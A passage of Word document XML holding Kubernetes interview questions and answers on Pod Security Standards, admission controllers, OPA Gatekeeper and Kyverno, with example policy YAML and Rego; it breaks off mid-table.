        <w:t xml:space="preserve">         * Shows warnings but allows creation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Pod violation (restricted mode)</w:t>
        <w:br/>
        <w:t>This would be blocked:</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">    securityContext:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      privileged: true</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key security controls enforced</w:t>
        <w:br/>
        <w:t>Pod Security Standards regulate:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Running as root or non-root</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Privileged containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Host networking access</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Volume types (hostPath restrictions)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Linux capabilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Seccomp profiles</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Privilege escalation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a building:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Privileged = open building (anyone can do anything)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Baseline = security guards + restricted access zones</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Restricted = high-security facility (biometric access, strict rules everywhere)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>PSS vs PSP (important)</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>PSS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>PSP (deprecated)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Status</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Active</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Removed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simple</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complex</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Flexibility</w:t>
        <w:br/>
        <w:tab/>
        <w:t>3 fixed levels</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Highly customizable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Maintenance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Built-in</w:t>
        <w:br/>
        <w:tab/>
        <w:t>External logic needed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Use Restricted for production workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Use Baseline for general apps</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Avoid Privileged unless absolutely necessary</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Combine with RBAC and Network Policies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Multi-tenant clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enterprise security compliance (ISO, SOC2)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Financial or regulated workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Production microservices security hardening</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Pod Security Standards in Kubernetes are built-in security policies that define three levels (Privileged, Baseline, Restricted) to control Pod permissions and enforce security best practices at the namespace level, helping prevent unsafe configurations and improve cluster security posture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q317. What is admission controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An Admission Controller in Kubernetes is a plugin that intercepts requests to the Kubernetes API server after authentication and authorization, and either allows, modifies, or rejects them before they are persisted in the cluster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Admission controllers act as a final checkpoint before a resource (Pod, Deployment, etc.) is created or updated in the cluster.</w:t>
        <w:br/>
        <w:t>Think of it as a gatekeeper that enforces policies after login but before saving changes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why admission controllers are used</w:t>
        <w:br/>
        <w:t>They help to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforce security policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Validate resource configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automatically mutate requests</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prevent misconfigurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensure compliance standards</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where it fits in Kubernetes request flow</w:t>
        <w:br/>
        <w:t>kubectl → API Server → Authentication → Authorization → Admission Controller → etcd</w:t>
        <w:br/>
        <w:t>Only after passing admission controllers is the object stored.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of Admission Controllers</w:t>
        <w:br/>
        <w:t>1. Mutating Admission Controllers</w:t>
        <w:br/>
        <w:t>Modify the request before it is saved</w:t>
        <w:br/>
        <w:t>They can:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Add default values</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Inject sidecars (e.g., service mesh proxies)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Modify resource limits</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automatically inject Envoy sidecar in a Pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Validating Admission Controllers</w:t>
        <w:br/>
        <w:t>Validate and approve or reject requests</w:t>
        <w:br/>
        <w:t>They can:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reject unsafe configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforce security policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensure required fields exist</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reject Pods running as root</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforce resource limits</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example use cases</w:t>
        <w:br/>
        <w:t>1. Security enforcement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Block privileged containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforce non-root users</w:t>
        <w:br/>
        <w:t>2. Resource control</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensure CPU/memory limits are set</w:t>
        <w:br/>
        <w:t>3. Policy enforcement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Restrict images from untrusted registries</w:t>
        <w:br/>
        <w:t>4. Defaulting behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Auto-assign namespaces or labels</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Built-in admission controllers examples</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * NamespaceLifecycle</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * LimitRanger</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * ResourceQuota</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * PodSecurity</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * DefaultStorageClass</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Custom admission controllers</w:t>
        <w:br/>
        <w:t>You can build your own using:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Admission Webhooks</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * MutatingWebhookConfiguration</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * ValidatingWebhookConfiguration</w:t>
        <w:br/>
        <w:t>These call external services for decisions.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example: validating webhook flow</w:t>
        <w:br/>
        <w:t>API Server → Webhook Service → Allow / Deny → API Server</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * API server = building reception</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Authentication = checking ID</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Authorization = checking access rights</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Admission controller = final security inspection before entry</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Runs inside API server request lifecycle</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Can modify or reject objects</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Works on all Kubernetes resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Critical for policy enforcement</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Difference from RBAC</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>RBAC</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Admission Controller</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Who can do what</w:t>
        <w:br/>
        <w:tab/>
        <w:t>What is allowed to be created</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Authorization</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Post-authorization</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scope</w:t>
        <w:br/>
        <w:tab/>
        <w:t>User permissions</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource validation/modification</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Use admission controllers for security enforcement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Combine with RBAC and Network Policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Use validating webhooks for strict policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Use mutating webhooks for defaults and injection</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>An Admission Controller in Kubernetes is a policy enforcement mechanism that intercepts API requests after authentication and authorization to validate, mutate, or reject objects before they are stored in etcd, enabling security, governance, and configuration control within the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q318. Explain OPA Gatekeeper.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: OPA Gatekeeper is a policy enforcement framework for Kubernetes built on top of Open Policy Agent (OPA) that allows you to define and enforce custom governance and security policies for Kubernetes resources.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>OPA Gatekeeper lets you define “rules for your cluster” and automatically enforce them at admission time.</w:t>
        <w:br/>
        <w:t>It acts as a policy engine that blocks or audits non-compliant Kubernetes resources before they are created or updated.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why OPA Gatekeeper is used</w:t>
        <w:br/>
        <w:t>Kubernetes alone does not enforce advanced business or security rules like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * “All Pods must have resource limits”</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * “No container should run as root”</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * “Only approved container registries are allowed”</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * “Every namespace must have labels”</w:t>
        <w:br/>
        <w:t>Gatekeeper solves this by:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Adding policy-as-code</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforcing organization-wide rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Providing audit + enforcement capabilities</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t>OPA Gatekeeper integrates with the Kubernetes API via admission webhooks.</w:t>
        <w:br/>
        <w:t>kubectl → API Server → Gatekeeper Webhook → Allow / Deny → etcd</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key components</w:t>
        <w:br/>
        <w:t>1. ConstraintTemplate</w:t>
        <w:br/>
        <w:t>Defines the policy logic using Rego language (OPA language).</w:t>
        <w:br/>
        <w:t>Example: “deny privileged containers”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Constraint</w:t>
        <w:br/>
        <w:t>Applies a policy to specific resources or namespaces.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Admission Webhook</w:t>
        <w:br/>
        <w:t>Intercepts API requests and evaluates policies.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example policy</w:t>
        <w:br/>
        <w:t>Step 1: ConstraintTemplate</w:t>
        <w:br/>
        <w:t>apiVersion: templates.gatekeeper.sh/v1</w:t>
        <w:br/>
        <w:t>kind: ConstraintTemplate</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: k8srequiredlimits</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  crd:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      names:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        kind: K8sRequiredLimits</w:t>
        <w:br/>
        <w:t xml:space="preserve">  targets:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - target: admission.k8s.gatekeeper.sh</w:t>
        <w:br/>
        <w:t xml:space="preserve">      rego: |</w:t>
        <w:br/>
        <w:t xml:space="preserve">        package k8srequiredlimits</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        violation[{"msg": msg}] {</w:t>
        <w:br/>
        <w:t xml:space="preserve">          not input.request.object.spec.containers[_].resources.limits</w:t>
        <w:br/>
        <w:t xml:space="preserve">          msg := "CPU and memory limits are required"</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Step 2: Constraint</w:t>
        <w:br/>
        <w:t>apiVersion: constraints.gatekeeper.sh/v1beta1</w:t>
        <w:br/>
        <w:t>kind: K8sRequiredLimits</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: require-limits</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  match:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    kinds:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - apiGroups: [""]</w:t>
        <w:br/>
        <w:t xml:space="preserve">        kinds: ["Pod"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What happens next</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * User tries to create a Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Gatekeeper evaluates policy</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * If no resource limits → request is rejected</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Modes of operation</w:t>
        <w:br/>
        <w:t>1. Enforce mode</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Blocks non-compliant resources</w:t>
        <w:br/>
        <w:t>2. Audit mode</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reports violations but allows creation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features</w:t>
        <w:br/>
        <w:t>1. Policy-as-code</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Policies written in Rego (OPA language)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Version-controlled and reusable</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Fine-grained control</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Namespace-level rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Label-based enforcement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Resource-type specific policies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Audit capability</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Detect existing non-compliant resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Continuous compliance monitoring</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What OPA Gatekeeper enforces</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Security rules (no privileged containers)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Resource requirements (limits/requests mandatory)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Image policies (trusted registries only)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Naming conventions</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Label enforcement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Namespace governance</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes = office building</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Admission Controller = security guard at entrance</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * OPA Gatekeeper = smart compliance officer with a rulebook who checks every person and ensures company policies are followed</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>OPA Gatekeeper vs Admission Controllers</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Admission Controller</w:t>
        <w:br/>
        <w:tab/>
        <w:t>OPA Gatekeeper</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Flexibility</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited/custom code</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High (policy-as-code)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Policy language</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Go/webhooks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rego</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Reusability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Audit support</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Built-in</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Medium</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Medium–High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Centralized policy management</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Strong security enforcement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * GitOps-friendly policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Auditable compliance</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reduces human error</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Requires learning Rego language</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Adds complexity to cluster setup</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Can introduce latency in admission path</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Debugging policies can be tricky</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enterprise security compliance (SOC2, ISO 27001)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Multi-tenant Kubernetes clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Regulated industries (finance, healthcare)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Standardizing DevOps practices across teams</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>OPA Gatekeeper is a policy enforcement framework for Kubernetes built on Open Policy Agent that uses admission webhooks and Rego-based policies to validate, mutate, or reject Kubernetes resources, enabling fine-grained, scalable, and auditable policy-as-code enforcement across clusters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q319. What is Kyverno?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Kyverno is a Kubernetes-native policy engine used to validate, mutate, and generate Kubernetes resources using YAML-based policies in Kubernetes.</w:t>
        <w:br/>
        <w:t>It is an alternative to OPA Gatekeeper, but is designed to be simpler because it does not require a separate policy language like Rego.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Kyverno lets you write Kubernetes policies using plain YAML instead of a custom language.</w:t>
        <w:br/>
        <w:t>It works as an admission controller + policy engine.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Kyverno is used</w:t>
        <w:br/>
        <w:t>It helps enforce cluster-wide rules such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Require resource limits on Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Block privileged containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforce image registry policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automatically add labels or annotations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Generate resources like NetworkPolicies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Kyverno works</w:t>
        <w:br/>
        <w:t>Kyverno integrates with the Kubernetes API server using admission webhooks:</w:t>
        <w:br/>
        <w:t>kubectl → API Server → Kyverno → Allow / Deny / Mutate → etcd</w:t>
        <w:br/>
        <w:t>It evaluates policies before resources are stored.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features of Kyverno</w:t>
        <w:br/>
        <w:t>1. Validate policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Accept or reject resources based on rules</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Block containers running as root</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Mutate policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automatically modify incoming resources</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Add labels</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Inject default resource limits</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Generate policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automatically create additional resources</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Create NetworkPolicies when a Namespace is created</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kyverno policy structure</w:t>
        <w:br/>
        <w:t>Kyverno uses pure YAML, making it easy for Kubernetes users.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example: validation policy</w:t>
        <w:br/>
        <w:t>apiVersion: kyverno.io/v1</w:t>
        <w:br/>
        <w:t>kind: ClusterPolicy</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: require-limits</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  validationFailureAction: enforce</w:t>
        <w:br/>
        <w:t xml:space="preserve">  rules:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: check-resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">    match:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        kinds:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">    validate:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      message: "CPU and memory limits are required"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      pattern:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          - resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">              limits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                memory: "?*"</w:t>
        <w:br/>
        <w:t xml:space="preserve">                cpu: "?*"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example: mutation policy</w:t>
        <w:br/>
        <w:t>apiVersion: kyverno.io/v1</w:t>
        <w:br/>
        <w:t>kind: ClusterPolicy</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: add-labels</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  rules:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: add-team-label</w:t>
        <w:br/>
        <w:t xml:space="preserve">    match:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        kinds:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">    mutate:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      patchStrategicMerge:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          labels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            team: "devops"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kyverno vs OPA Gatekeeper</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kyverno</w:t>
        <w:br/>
        <w:tab/>
        <w:t>OPA Gatekeeper</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Policy language</w:t>
        <w:br/>
        <w:tab/>
